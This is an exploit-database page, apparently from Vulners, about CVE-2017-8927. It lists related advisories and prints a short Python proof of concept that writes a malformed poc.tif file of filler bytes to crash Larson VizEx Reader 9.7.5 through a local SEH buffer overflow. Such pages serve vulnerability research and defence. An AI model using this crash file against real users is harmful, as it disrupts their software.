| Reporter | Title | Published | Views | Family All 10 |
|---|---|---|---|---|
| Larson VizEx Reader 9.7.5 - Local Buffer Overflow (SEH) Exploit | 15 May 201700:00 | – | zdt | |
| CVE-2017-8927 | 14 May 201700:00 | – | circl | |
| Larson VizEx Reader Buffer Overflow Vulnerability | 17 May 201700:00 | – | cnvd | |
| CVE-2017-8927 | 15 May 201718:00 | – | cve | |
| CVE-2017-8927 | 15 May 201718:00 | – | cvelist | |
| EUVD-2017-17867 | 7 Oct 202500:30 | – | euvd | |
| Larson VizEx Reader 9.7.5 - Local Buffer Overflow (SEH) | 14 May 201700:00 | – | exploitpack | |
| CVE-2017-8927 | 15 May 201718:29 | – | nvd | |
| CVE-2017-8927 | 15 May 201718:29 | – | osv | |
| Buffer overflow | 15 May 201718:29 | – | prion |
#!/usr/bin/python
# Exploit Title : Larson VizEx Reader 9.7.5 - Local Buffer Overflow (SEH)
# Date : 14/05/2017
# Exploit Author : Muhann4d
# CVE : CVE-2017-8927
# Vendor Homepage : http://www.cgmlarson.com/
# Software Link : http://download.freedownloadmanager.org/Windows-PC/Larson-VizEx-Reader/FREE-9.7.5.html
# Affected Versions : 9.7.5
# Category : Denial of Service (DoS) Local
# Tested on OS : Windows 7 Professional SP1 32bit
# Proof of Concept : run the exploit, open the poc.tif file with Larson VizEx Reader 9.7.5
# Vendor has been cantacted but no reply
buf = "\x41" * 800
buff = "\x42" * 4
bufff = "\x43" * 4
buffff = "\x44" * 9999
f = open ("poc.tif", "w")
f.write(buf + buff + bufff + buffff)
f.close()Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation